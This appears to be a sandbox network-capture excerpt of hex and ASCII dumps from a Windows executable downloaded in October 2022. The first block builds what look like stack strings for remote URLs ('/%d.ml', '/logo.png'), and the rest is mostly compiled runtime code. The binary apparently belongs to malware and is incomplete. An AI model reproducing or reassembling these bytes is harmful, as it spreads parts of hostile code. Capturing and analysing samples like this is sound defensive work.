                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC15985INData Raw: 24 64 ba 2e 00 63 00 b9 6f 00 6d 00 8d 84 24 88 00 00 00 bf 7a 00 67 00 89 74 24 28 89 74 24 68 8b 35 08 d0 40 00 50 c7 44 24 10 74 00 70 00 c7 44 24 14 3a 00 2f 00 c7 44 24 18 2f 00 78 00 c7 44 24 1c 76 00 2e 00 89 7c 24 24 89 54 24 30 89 4c 24 34 c7 44 24 38 2f 00 25 00 c7 44 24 3c 64 00 2e 00 c7 44 24 44 6d 00 6c 00 c7 44 24 48 00 00 00 00 c7 44 24 50 74 00 70 00 c7 44 24 54 3a 00 2f 00 c7 44 24 58 2f 00 78 00 c7 44 24 5c 76 00 2e 00 89 7c 24 64 89 54 24 70 89 4c 24 74 c7 44 24 78 2f 00 6c 00 c7 44 24 7c 6f 00 67 00 c7 84 24 80 00 00 00 6f 00 2e 00 c7 84 24 84 00 00 00 70 00 6e 00 c7 84 24 88 00 00 00 67 00 00 00 c6 84 24 8c 00 00 00 55 c6 84 24 8d 00 00 00 53 c6 84 24 8e 00 00 00 45 c6 84 24 8f 00 00 00 52 c6 84 24 90 00 00 00 33 c6 84 24 91 00 00 00
                                                                                                                                                                                                                                    Data Ascii: $d.com$zgt$(t$h5@PD$tpD$:/D$/xD$v.|$$T$0L$4D$8/%D$<d.D$DmlD$HD$PtpD$T:/D$X/xD$\v.|$dT$pL$tD$x/lD$|og$o.$pn$g$U$S$E$R$3$
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC15986INData Raw: 03 20 00 00 c3 ff 74 24 04 e8 bb ff ff ff f7 d8 1b c0 f7 d8 59 48 c3 83 3d c8 10 41 00 02 74 05 e8 22 24 00 00 ff 74 24 04 e8 79 22 00 00 68 ff 00 00 00 e8 b1 1f 00 00 59 59 c3 66 81 3d 00 00 40 00 4d 5a 75 33 a1 3c 00 40 00 81 b8 00 00 40 00 50 45 00 00 75 22 66 81 b8 18 00 40 00 0b 01 75 17 83 b8 74 00 40 00 0e 76 0e 33 c9 39 88 e8 00 40 00 0f 95 c1 8b c1 c3 33 c0 c3 6a 1c 68 00 ef 40 00 e8 62 10 00 00 bf 94 00 00 00 57 6a 00 8b 1d 40 d0 40 00 ff d3 50 ff 15 3c d0 40 00 8b f0 85 f6 75 12 6a 12 e8 6b ff ff ff 59 b8 ff 00 00 00 e9 74 01 00 00 89 3e 56 ff 15 38 d0 40 00 56 6a 00 85 c0 75 0b ff d3 50 ff 15 34 d0 40 00 eb db 8b 46 10 89 45 e0 8b 46 04 89 45 dc 8b 46 08 89 45 d8 8b 7e 0c 81 e7 ff 7f 00 00 ff d3 50 ff 15 34 d0 40 00 8b 75 e0 83 fe 02 74 06 81
                                                                                                                                                                                                                                    Data Ascii: t$YH=At"$t$y"hYYf=@MZu3<@@PEu"f@ut@v39@3jh@bWj@@P<@ujkYt>V8@VjuP4@FEFEFE~P4@ut
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC15987INData Raw: 0a e8 59 00 00 00 59 89 5d fc 39 1e 75 2c 68 a0 0f 00 00 57 e8 8c 28 00 00 59 59 85 c0 75 17 57 e8 21 f8 ff ff 59 e8 f6 fd ff ff c7 00 0c 00 00 00 89 5d e4 eb 0b 89 3e eb 07 57 e8 06 f8 ff ff 59 c7 45 fc fe ff ff ff e8 09 00 00 00 8b 45 e4 e8 81 0b 00 00 c3 6a 0a e8 2a ff ff ff 59 c3 55 8b ec 8b 45 08 56 8d 34 c5 a0 01 41 00 83 3e 00 75 13 50 e8 24 ff ff ff 85 c0 59 75 08 6a 11 e8 c2 19 00 00 59 ff 36 ff 15 6c d0 40 00 5e 5d c3 68 40 01 00 00 6a 00 ff 35 f4 13 41 00 ff 15 3c d0 40 00 85 c0 a3 d8 21 41 00 75 01 c3 8b 4c 24 04 83 25 48 15 41 00 00 83 25 d4 21 41 00 00 a3 e0 21 41 00 33 c0 89 0d dc 21 41 00 c7 05 e4 21 41 00 10 00 00 00 40 c3 8b 0d d4 21 41 00 a1 d8 21 41 00 6b c9 14 03 c8 eb 12 8b 54 24 04 2b 50 0c 81 fa 00 00 10 00 72 09 83 c0 14 3b c1 72
                                                                                                                                                                                                                                    Data Ascii: YY]9u,hW(YYuW!Y]>WYEEj*YUEV4A>uP$YujY6l@^]h@j5A<@!AuL$%HA%!A!A3!A!A@!A!AkT$+Pr;r
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC15989INData Raw: ef ff ff c7 40 fc f0 0f 00 00 89 50 04 c7 80 e8 0f 00 00 f0 0f 00 00 05 00 10 00 00 49 75 cb 8b 55 fc 8b 45 f8 05 f8 01 00 00 8d 4f 0c 89 48 04 89 41 08 8d 4a 0c 89 48 08 89 41 04 83 64 9e 44 00 33 ff 47 89 bc 9e c4 00 00 00 8a 46 43 8a c8 fe c1 84 c0 8b 45 08 88 4e 43 75 03 09 78 04 ba 00 00 00 80 8b cb d3 ea f7 d2 21 50 08 8b c3 5f 5e 5b c9 c3 55 8b ec 83 ec 0c 8b 4d 08 8b 41 10 53 56 8b 75 10 57 8b 7d 0c 8b d7 2b 51 0c 83 c6 17 c1 ea 0f 8b ca 69 c9 04 02 00 00 8d 8c 01 44 01 00 00 89 4d f4 8b 4f fc 83 e6 f0 49 3b f1 8d 7c 39 fc 8b 1f 89 4d 10 89 5d fc 0f 8e 55 01 00 00 f6 c3 01 0f 85 45 01 00 00 03 d9 3b f3 0f 8f 3b 01 00 00 8b 4d fc c1 f9 04 49 83 f9 3f 89 4d f8 76 06 6a 3f 59 89 4d f8 8b 5f 04 3b 5f 08 75 43 83 f9 20 bb 00 00 00 80 73 1a d3 eb 8b 4d
                                                                                                                                                                                                                                    Data Ascii: @PIuUEOHAJHAdD3GFCENCux!P_^[UMASVuW}+QiDMOI;|9M]UE;;MI?Mvj?YM_;_uC sM
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC15990INData Raw: 08 89 79 08 0f 84 8d 00 00 00 8b 4d f4 8d 0c f1 8b 79 04 89 4a 08 89 7a 04 89 51 04 8b 4a 04 89 51 08 8b 4a 04 3b 4a 08 75 5e 8a 4c 06 04 88 4d 0b fe c1 83 fe 20 88 4c 06 04 7d 23 80 7d 0b 00 75 0b bf 00 00 00 80 8b ce d3 ef 09 3b 8b ce bf 00 00 00 80 d3 ef 8b 4d fc 09 7c 88 44 eb 29 80 7d 0b 00 75 0d 8d 4e e0 bf 00 00 00 80 d3 ef 09 7b 04 8b 4d fc 8d bc 88 c4 00 00 00 8d 4e e0 be 00 00 00 80 d3 ee 09 37 8b 4d f8 85 c9 74 0b 89 0a 89 4c 11 fc eb 03 8b 4d f8 8b 75 f0 03 d1 8d 4e 01 89 0a 89 4c 32 fc 8b 75 f4 8b 0e 85 c9 8d 79 01 89 3e 75 1a 3b 1d 48 15 41 00 75 12 8b 4d fc 3b 0d e8 21 41 00 75 07 83 25 48 15 41 00 00 8b 4d fc 89 08 8d 42 04 5f 5e 5b c9 c3 cc cc 68 b0 33 40 00 64 ff 35 00 00 00 00 8b 44 24 10 89 6c 24 10 8d 6c 24 10 2b e0 53 56 57 a1 20 00
                                                                                                                                                                                                                                    Data Ascii: yMyJzQJQJ;Ju^LM L}#}u;M|D)}uN{MN7MtLMuNL2uy>u;HAuM;!Au%HAMB_^[h3@d5D$l$l$+SVW
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC15991INData Raw: 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c 83 e0 03 2b c8 ff 24 85 e4 37 40 00 ff 24 8d e0 38 40 00 90 f4 37 40 00 18 38 40 00 40 38 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 e0 38 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 e0 38 40 00 90 8a 46 03 23 d1 88 47 03 8a 46 02 88 47 02 8a 46 01 c1 e9 02 88 47 01 83 ee 03 83 ef 03 83 f9 08 0f 82 56 ff ff ff fd f3 a5 fc ff 24 95 e0 38 40 00 8d 49 00 94 38 40 00 9c 38 40 00 a4 38 40 00 ac 38 40 00 b4 38 40 00 bc 38 40 00 c4 38 40 00 d7 38 40 00 8b 44 8e 1c 89 44 8f 1c 8b 44 8e 18 89 44 8f 18 8b 44 8e 14 89 44 8f 14 8b 44 8e 10 89 44 8f 10 8b 44 8e 0c 89 44 8f 0c 8b 44 8e 08 89 44 8f 08 8b
                                                                                                                                                                                                                                    Data Ascii: Ir+$7@$8@7@8@@8@F#Gr$8@IF#GFGr$8@F#GFGFGV$8@I8@8@8@8@8@8@8@8@DDDDDDDDDDDD
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC15993INData Raw: a1 38 05 41 00 89 46 6c ff 76 6c e8 4e 1f 00 00 59 c7 45 fc fe ff ff ff e8 06 00 00 00 e8 50 f6 ff ff c3 6a 0c e8 f9 e9 ff ff 59 c3 56 57 ff 15 30 d0 40 00 8b f8 e8 d6 fe ff ff ff 35 d0 02 41 00 ff 35 d4 02 41 00 ff 15 7c d0 40 00 ff d0 8b f0 85 f6 75 4e 68 14 02 00 00 6a 01 e8 4b 03 00 00 8b f0 85 f6 59 59 74 3a 56 ff 35 d0 02 41 00 ff 35 60 15 41 00 e8 2a fe ff ff 59 ff d0 85 c0 74 18 6a 00 56 e8 ee fe ff ff 59 59 ff 15 94 d0 40 00 83 4e 04 ff 89 06 eb 09 56 e8 42 e2 ff ff 59 33 f6 57 ff 15 90 d0 40 00 5f 8b c6 5e c3 56 e8 77 ff ff ff 8b f0 85 f6 75 08 6a 10 e8 20 04 00 00 59 8b c6 5e c3 6a 08 68 80 ef 40 00 e8 5a f5 ff ff 8b 75 08 85 f6 0f 84 ea 00 00 00 8b 46 24 85 c0 74 07 50 e8 f7 e1 ff ff 59 8b 46 2c 85 c0 74 07 50 e8 e9 e1 ff ff 59 8b 46 34 85 c0
                                                                                                                                                                                                                                    Data Ascii: 8AFlvlNYEPjYVW0@5A5A|@uNhjKYYt:V5A5`A*YtjVYY@NVBY3W@_^Vwuj Y^jh@ZuF$tPYF,tPYF4
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC15994INData Raw: 06 85 c0 74 02 ff d0 83 c6 04 3b 74 24 08 72 ef 5e c3 56 8b 74 24 08 33 c0 eb 0f 85 c0 75 11 8b 0e 85 c9 74 02 ff d1 83 c6 04 3b 74 24 0c 72 eb 5e c3 8b 4c 24 04 56 33 f6 3b ce 75 1d e8 22 e3 ff ff 56 56 56 56 56 c7 00 16 00 00 00 e8 71 f7 ff ff 83 c4 14 6a 16 58 5e c3 a1 70 15 41 00 3b c6 74 da 89 01 33 c0 5e c3 8b 44 24 04 56 33 f6 3b c6 75 1d e8 eb e2 ff ff 56 56 56 56 56 c7 00 16 00 00 00 e8 3a f7 ff ff 83 c4 14 6a 16 58 5e c3 39 35 70 15 41 00 74 db 8b 0d 7c 15 41 00 89 08 33 c0 5e c3 83 3d c8 eb 40 00 00 74 1a 68 c8 eb 40 00 e8 32 13 00 00 85 c0 59 74 0b ff 74 24 04 ff 15 c8 eb 40 00 59 e8 48 25 00 00 68 88 d1 40 00 68 70 d1 40 00 e8 36 ff ff ff 85 c0 59 59 75 54 56 57 68 86 4f 40 00 e8 01 df ff ff be 54 d1 40 00 8b c6 bf 6c d1 40 00 3b c7 59 73 0f
                                                                                                                                                                                                                                    Data Ascii: t;t$r^Vt$3ut;t$r^L$V3;u"VVVVVqjX^pA;t3^D$V3;uVVVVV:jX^95pAt|A3^=@th@2Ytt$@YH%h@hp@6YYuTVWhO@T@l@;Ys
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC15995INData Raw: 90 00 00 c0 75 09 c7 46 64 81 00 00 00 eb 4e 3d 91 00 00 c0 75 09 c7 46 64 84 00 00 00 eb 3e 3d 93 00 00 c0 75 09 c7 46 64 85 00 00 00 eb 2e 3d 8d 00 00 c0 75 09 c7 46 64 82 00 00 00 eb 1e 3d 8f 00 00 c0 75 09 c7 46 64 86 00 00 00 eb 0e 3d 92 00 00 c0 75 07 c7 46 64 8a 00 00 00 ff 76 64 6a 08 ff d3 59 89 7e 64 eb 07 83 60 08 00 51 ff d3 8b 45 f8 59 89 46 60 83 c8 ff 5b 5f 5e c9 c3 55 56 8b 35 c4 10 41 00 57 33 ed 33 ff 3b f5 75 1a 83 c8 ff e9 a7 00 00 00 66 3d 3d 00 74 01 47 56 e8 87 26 00 00 59 8d 74 46 02 0f b7 06 66 3b c5 75 e6 53 6a 04 47 57 e8 3d f8 ff ff 8b d8 3b dd 59 59 89 1d 98 15 41 00 75 05 83 c8 ff eb 6f 8b 35 c4 10 41 00 eb 42 56 e8 4f 26 00 00 8b f8 47 66 83 3e 3d 59 74 2f 6a 02 57 e8 0a f8 ff ff 3b c5 59 59 89 03 74 4c 56 57 50 e8 c1 25 00
                                                                                                                                                                                                                                    Data Ascii: uFdN=uFd>=uFd.=uFd=uFd=uFdvdjY~d`QEYF`[_^UV5AW33;uf==tGV&YtFf;uSjGW=;YYAuo5ABVO&Gf>=Yt/jW;YYtLVWP%
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC15997INData Raw: 1e e6 ff ff 33 ff 89 7d fc 8d 45 9c 50 ff 15 d8 d0 40 00 c7 45 fc fe ff ff ff 6a 28 6a 20 5e 56 e8 7c f3 ff ff 59 59 3b c7 0f 84 00 02 00 00 a3 c0 20 41 00 89 35 bc 20 41 00 8d 88 00 05 00 00 eb 29 c6 40 04 00 83 08 ff c6 40 05 0a 89 78 08 c6 40 24 00 c6 40 25 0a c6 40 26 0a 83 c0 28 8b 0d c0 20 41 00 81 c1 00 05 00 00 3b c1 72 d3 66 39 7d ce 0f 84 fd 00 00 00 8b 45 d0 3b c7 0f 84 f2 00 00 00 8b 38 8d 58 04 8d 04 3b 89 45 e4 b8 00 08 00 00 3b f8 7c 02 8b f8 33 f6 46 eb 52 6a 28 6a 20 e8 f9 f2 ff ff 59 59 85 c0 74 4d 8d 0c b5 c0 20 41 00 89 01 83 05 bc 20 41 00 20 8d 90 00 05 00 00 eb 26 c6 40 04 00 83 08 ff c6 40 05 0a 83 60 08 00 80 60 24 80 c6 40 25 0a c6 40 26 0a 83 c0 28 8b 11 81 c2 00 05 00 00 3b c2 72 d6 46 39 3d bc 20 41 00 7c a6 eb 06 8b 3d bc 20
                                                                                                                                                                                                                                    Data Ascii: 3}EP@Ej(j ^V|YY; A5 A)@@x@$@%@&( A;rf9}E;8X;E;|3FRj(j YYtM A A &@@``$@%@&(;rF9= A|=
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC15998INData Raw: f8 89 44 8f f8 8b 44 8e fc 89 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 a4 52 40 00 8b ff b4 52 40 00 bc 52 40 00 c8 52 40 00 dc 52 40 00 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8a 46 01 88 47 01 8b 45 08 5e 5f c9 c3 8d 49 00 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8d 74 31 fc 8d 7c 39 fc f7 c7 03 00 00 00 75 24 c1 e9 02 83 e2 03 83 f9 08 72 0d fd f3 a5 fc ff 24 95 40 54 40 00 8b ff f7 d9 ff 24 8d f0 53 40 00 8d 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c 83 e0 03 2b c8 ff 24 85 44 53 40 00 ff 24 8d 40 54 40 00 90 54 53 40 00 78 53 40 00 a0 53 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 40 54 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46
                                                                                                                                                                                                                                    Data Ascii: DDD$R@R@R@R@R@E^_E^_FGE^_IFGFGE^_t1|9u$r$@T@$S@Ir+$DS@$@T@TS@xS@S@F#Gr$@T@IF#GF
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC15999INData Raw: 10 c1 e9 07 eb 06 8d 9b 00 00 00 00 66 0f 6f 06 66 0f 6f 4e 10 66 0f 6f 56 20 66 0f 6f 5e 30 66 0f 7f 07 66 0f 7f 4f 10 66 0f 7f 57 20 66 0f 7f 5f 30 66 0f 6f 66 40 66 0f 6f 6e 50 66 0f 6f 76 60 66 0f 6f 7e 70 66 0f 7f 67 40 66 0f 7f 6f 50 66 0f 7f 77 60 66 0f 7f 7f 70 8d b6 80 00 00 00 8d bf 80 00 00 00 49 75 a3 8b 75 f8 8b 7d fc 8b e5 5d c3 55 8b ec 83 ec 1c 89 7d f4 89 75 f8 89 5d fc 8b 5d 0c 8b c3 99 8b c8 8b 45 08 33 ca 2b ca 83 e1 0f 33 ca 2b ca 99 8b f8 33 fa 2b fa 83 e7 0f 33 fa 2b fa 8b d1 0b d7 75 4a 8b 75 10 8b ce 83 e1 7f 89 4d e8 3b f1 74 13 2b f1 56 53 50 e8 27 ff ff ff 83 c4 0c 8b 45 08 8b 4d e8 85 c9 74 77 8b 5d 10 8b 55 0c 03 d3 2b d1 89 55 ec 03 d8 2b d9 89 5d f0 8b 75 ec 8b 7d f0 8b 4d e8 f3 a4 8b 45 08 eb 53 3b cf 75 35 f7 d9 83 c1 10
                                                                                                                                                                                                                                    Data Ascii: fofoNfoV fo^0ffOfW f_0fof@fonPfov`fo~pfg@foPfw`fpIuu}]U}u]]E3+3+3+3+uJuM;t+VSP'EMtw]U+U+]u}MES;u5
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16001INData Raw: 00 00 00 85 c0 74 03 50 ff d7 8b 86 c0 00 00 00 85 c0 74 03 50 ff d7 6a 06 8d 5e 50 5d 81 7b f8 58 04 41 00 74 09 8b 03 85 c0 74 03 50 ff d7 83 7b fc 00 74 0a 8b 43 04 85 c0 74 03 50 ff d7 83 c3 10 4d 75 d8 8b 86 d4 00 00 00 05 b4 00 00 00 50 ff d7 5f 5d 5b 8b c6 5e c3 85 ff 74 37 85 c0 74 33 56 8b 30 3b f7 74 28 57 89 38 e8 d7 fe ff ff 85 f6 59 74 1b 56 e8 52 ff ff ff 83 3e 00 59 75 0f 81 fe 60 04 41 00 74 07 56 e8 78 fd ff ff 59 8b c7 5e c3 33 c0 c3 6a 0c 68 68 f0 40 00 e8 73 d5 ff ff e8 f0 df ff ff 8b f0 a1 9c 0b 41 00 85 46 70 74 22 83 7e 6c 00 74 1c e8 d9 df ff ff 8b 70 6c 85 f6 75 08 6a 20 e8 fe e3 ff ff 59 8b c6 e8 86 d5 ff ff c3 6a 0c e8 07 ca ff ff 59 83 65 fc 00 8d 46 6c 8b 3d 38 05 41 00 e8 69 ff ff ff 89 45 e4 c7 45 fc fe ff ff ff e8 02 00 00
                                                                                                                                                                                                                                    Data Ascii: tPtPj^P]{XAttP{tCtPMuP_][^t7t3V0;t(W8YtVR>Yu`AtVxY^3jhh@sAFpt"~ltpluj YjYeFl=8AiEE
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16002INData Raw: 00 00 0f b6 46 ff 0f b6 c9 e9 a6 00 00 00 68 01 01 00 00 8d 43 1c 56 50 e8 a5 d2 ff ff 8b 4d e4 83 c4 0c 6b c9 30 89 75 e0 8d b1 88 09 41 00 89 75 e4 eb 2a 8a 46 01 84 c0 74 28 0f b6 3e 0f b6 c0 eb 12 8b 45 e0 8a 80 74 09 41 00 08 44 3b 1d 0f b6 46 01 47 3b f8 76 ea 8b 7d 08 46 46 80 3e 00 75 d1 8b 75 e4 ff 45 e0 83 c6 08 83 7d e0 04 89 75 e4 72 e9 8b c7 89 7b 04 c7 43 08 01 00 00 00 e8 2f fb ff ff 6a 06 89 43 0c 8d 43 10 8d 89 7c 09 41 00 5a 66 8b 31 41 66 89 30 41 40 40 4a 75 f3 8b f3 e8 90 fb ff ff e9 e5 fe ff ff 80 4c 03 1d 04 40 3b c1 76 f6 46 46 80 7e ff 00 0f 85 34 ff ff ff 8d 43 1e b9 fe 00 00 00 80 08 08 40 49 75 f9 8b 43 04 e8 da fa ff ff 89 43 0c 89 53 08 eb 03 89 73 08 33 c0 8d 7b 10 ab ab ab eb b2 39 35 48 1b 41 00 0f 85 90 fe ff ff 83 c8 ff
                                                                                                                                                                                                                                    Data Ascii: FhCVPMk0uAu*Ft(>EtAD;FG;v}FF>uuE}ur{C/jCC|AZf1Af0A@@JuL@;vFF~4C@IuCCSs3{95HA
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16003INData Raw: 7d e0 75 6c 8b f0 ff 15 30 d0 40 00 50 e8 a8 bd ff ff 59 89 06 eb 5f 85 ff 0f 85 83 00 00 00 e8 d1 bd ff ff 39 7d e0 74 68 c7 00 0c 00 00 00 eb 71 85 f6 75 01 46 56 53 6a 00 ff 35 f4 13 41 00 ff 15 74 d0 40 00 8b f8 85 ff 75 56 39 05 a4 1b 41 00 74 34 56 e8 27 03 00 00 59 85 c0 74 1f 83 fe e0 76 cd 56 e8 17 03 00 00 59 e8 85 bd ff ff c7 00 0c 00 00 00 33 c0 e8 2d cb ff ff c3 e8 72 bd ff ff e9 7c ff ff ff 85 ff 75 16 e8 64 bd ff ff 8b f0 ff 15 30 d0 40 00 50 e8 1b bd ff ff 89 06 59 8b c7 eb d2 56 57 33 ff 8d b7 68 0a 41 00 ff 36 e8 ba d2 ff ff 83 c7 04 83 ff 28 59 89 06 72 e8 5f 5e c3 6a 08 68 08 f1 40 00 e8 94 ca ff ff e8 11 d5 ff ff 8b 40 78 85 c0 74 16 83 65 fc 00 ff d0 eb 07 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff e8 ff 11 00 00 e8 ad ca ff ff c3 e8
                                                                                                                                                                                                                                    Data Ascii: }ul0@PY_9}thquFVSj5At@uV9At4V'YtvVY3-r|ud0@PYVW3hA6(Yr_^jh@@xte3@eE
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16005INData Raw: ff ff 6a 16 5e 89 30 53 53 53 53 53 e8 ea cc ff ff 83 c4 14 8b c6 eb 3d 8b 74 24 18 3b f3 75 04 88 18 eb d9 8b d0 38 1a 74 04 42 4f 75 f8 3b fb 74 ee 8a 0e 88 0a 42 46 3a cb 74 03 4f 75 f3 3b fb 75 10 88 18 e8 52 b8 ff ff 6a 22 59 89 08 8b f1 eb b4 33 c0 5f 5e 5b c3 55 8b ec 53 56 8b 75 08 33 db 39 5d 14 57 75 10 3b f3 75 10 39 5d 0c 75 12 33 c0 5f 5e 5b 5d c3 3b f3 74 07 8b 7d 0c 3b fb 77 1b e8 13 b8 ff ff 6a 16 5e 89 30 53 53 53 53 53 e8 63 cc ff ff 83 c4 14 8b c6 eb d5 39 5d 14 75 04 88 1e eb ca 8b 55 10 3b d3 75 04 88 1e eb d1 83 7d 14 ff 8b c6 75 0f 8a 0a 88 08 40 42 3a cb 74 1e 4f 75 f3 eb 19 8a 0a 88 08 40 42 3a cb 74 08 4f 74 05 ff 4d 14 75 ee 39 5d 14 75 02 88 18 3b fb 75 8b 83 7d 14 ff 75 0f 8b 45 0c 6a 50 88 5c 06 ff 58 e9 78 ff ff ff 88 1e e8
                                                                                                                                                                                                                                    Data Ascii: j^0SSSSS=t$;u8tBOu;tBF:tOu;uRj"Y3_^[USVu39]Wu;u9]u3_^[];t};wj^0SSSSSc9]uU;u}u@B:tOu@B:tOtMu9]u;u}uEjP\Xx
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16006INData Raw: ad ff ff ff 76 4c e8 5d ad ff ff ff 76 50 e8 55 ad ff ff ff 76 54 e8 4d ad ff ff ff 76 58 e8 45 ad ff ff ff 76 5c e8 3d ad ff ff ff 76 60 e8 35 ad ff ff ff 76 64 e8 2d ad ff ff ff 76 68 e8 25 ad ff ff ff 76 6c e8 1d ad ff ff ff 76 70 e8 15 ad ff ff ff 76 74 e8 0d ad ff ff ff 76 78 e8 05 ad ff ff ff 76 7c e8 fd ac ff ff 83 c4 40 ff b6 80 00 00 00 e8 ef ac ff ff ff b6 84 00 00 00 e8 e4 ac ff ff ff b6 88 00 00 00 e8 d9 ac ff ff ff b6 8c 00 00 00 e8 ce ac ff ff ff b6 90 00 00 00 e8 c3 ac ff ff ff b6 94 00 00 00 e8 b8 ac ff ff ff b6 98 00 00 00 e8 ad ac ff ff ff b6 9c 00 00 00 e8 a2 ac ff ff ff b6 a0 00 00 00 e8 97 ac ff ff ff b6 a4 00 00 00 e8 8c ac ff ff ff b6 a8 00 00 00 e8 81 ac ff ff 83 c4 2c 5e c3 56 8b 74 24 08 85 f6 74 35 8b 06 3b 05 68 0b 41 00 74 07
                                                                                                                                                                                                                                    Data Ascii: vL]vPUvTMvXEv\=v`5vd-vh%vlvpvtvxv|@,^Vt$t5;hAt
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16007INData Raw: 00 00 eb 11 50 e8 7e e2 ff ff 3b c3 59 74 09 c7 00 dd dd 00 00 83 c0 08 89 45 f4 eb 03 89 5d f4 39 5d f4 0f 84 3d 01 00 00 57 ff 75 f4 ff 75 14 ff 75 10 6a 01 ff 75 20 ff d6 85 c0 0f 84 e2 00 00 00 8b 35 1c d0 40 00 53 53 57 ff 75 f4 ff 75 0c ff 75 08 ff d6 8b c8 3b cb 89 4d f8 0f 84 c1 00 00 00 66 f7 45 0c 00 04 74 29 39 5d 1c 0f 84 b0 00 00 00 3b 4d 1c 0f 8f a7 00 00 00 ff 75 1c ff 75 18 57 ff 75 f4 ff 75 0c ff 75 08 ff d6 e9 90 00 00 00 3b cb 7e 45 6a e0 33 d2 58 f7 f1 83 f8 02 72 39 8d 44 09 08 3d 00 04 00 00 77 16 e8 3a 06 00 00 8b f4 3b f3 74 6a c7 06 cc cc 00 00 83 c6 08 eb 1a 50 e8 bd e1 ff ff 3b c3 59 74 09 c7 00 dd dd 00 00 83 c0 08 8b f0 eb 02 33 f6 3b f3 74 41 ff 75 f8 56 57 ff 75 f4 ff 75 0c ff 75 08 ff 15 1c d0 40 00 85 c0 74 22 39 5d 1c 53
                                                                                                                                                                                                                                    Data Ascii: P~;YtE]9]=Wuuuju 5@SSWuuu;MfEt)9];MuuWuuu;~Ej3Xr9D=w:;tjP;Yt3;tAuVWuuu@t"9]S
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16009INData Raw: 38 30 30 30 0d 0a eb 10 8b 91 c8 00 00 00 0f b6 c3 0f b6 04 42 83 e0 08 85 c0 74 05 8a 1f 47 eb c7 80 fb 2d 75 06 83 4d 18 02 eb 05 80 fb 2b 75 03 8a 1f 47 8b 45 14 85 c0 0f 8c 49 01 00 00 83 f8 01 0f 84 40 01 00 00 83 f8 24 0f 8f 37 01 00 00 85 c0 75 2a 80 fb 30 74 09 c7 45 14 0a 00 00 00 eb 34 8a 07 3c 78 74 0d 3c 58 74 09 c7 45 14 08 00 00 00 eb 21 c7 45 14 10 00 00 00 eb 0a 83 f8 10 75 13 80 fb 30 75 0e 8a 07 3c 78 74 04 3c 58 75 04 47 8a 1f 47 8b b1 c8 00 00 00 83 c8 ff 33 d2 f7 75 14 0f b6 cb 0f b7 0c 4e f6 c1 04 74 08 0f be cb 83 e9 30 eb 1a 66 f7 c1 03 01 74 31 8a cb 80 e9 61 80 f9 19 0f be cb 77 03 83 e9 20 83 c1 c9 3b 4d 14 73 19 83 4d 18 08 39 45 fc 72 27 75 04 3b ca 76 21 83 4d 18 04 83 7d 10 00 75 23 8b 45 18 4f a8 08 75 20 83 7d 10 00 74 03
                                                                                                                                                                                                                                    Data Ascii: 8000BtG-uM+uGEI@$7u*0tE4<xt<XtE!Eu0u<xt<XuGG3uNt0ft1aw ;MsM9Er'u;v!M}u#EOu }t
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16010INData Raw: c3 e9 a0 00 00 00 8b 45 e8 83 b8 ac 00 00 00 01 7e 31 89 5d 08 c1 7d 08 08 8d 45 e8 50 8b 45 08 25 ff 00 00 00 50 e8 4a fc ff ff 85 c0 59 59 74 12 8a 45 08 6a 02 88 45 fc 88 5d fd c6 45 fe 00 59 eb 15 e8 6c a3 ff ff c7 00 2a 00 00 00 33 c9 88 5d fc c6 45 fd 00 41 8b 45 e8 6a 01 ff 70 04 8d 55 f8 6a 03 52 51 8d 4d fc 51 56 ff 70 14 8d 45 e8 50 e8 f2 f7 ff ff 83 c4 24 85 c0 0f 84 6f ff ff ff 83 f8 01 75 06 0f b6 45 f8 eb 0b 0f b6 4d f9 33 c0 8a 65 f8 0b c1 80 7d f4 00 74 07 8b 4d f0 83 61 70 fd 5e 5b c9 c3 83 3d 24 1b 41 00 00 75 10 8b 44 24 04 8d 48 bf 83 f9 19 77 11 83 c0 20 c3 6a 00 ff 74 24 08 e8 c5 fe ff ff 59 59 c3 cc cc cc cc cc cc cc 51 8d 4c 24 04 2b c8 1b c0 f7 d0 23 c8 8b c4 25 00 f0 ff ff 3b c8 72 0a 8b c1 59 94 8b 00 89 04 24 c3 2d 00 10 00 00
                                                                                                                                                                                                                                    Data Ascii: E~1]}EPE%PJYYtEjE]EYl*3]EAEjpUjRQMQVpEP$ouEM3e}tMap^[=$AuD$Hw jt$YYQL$+#%;rY$-
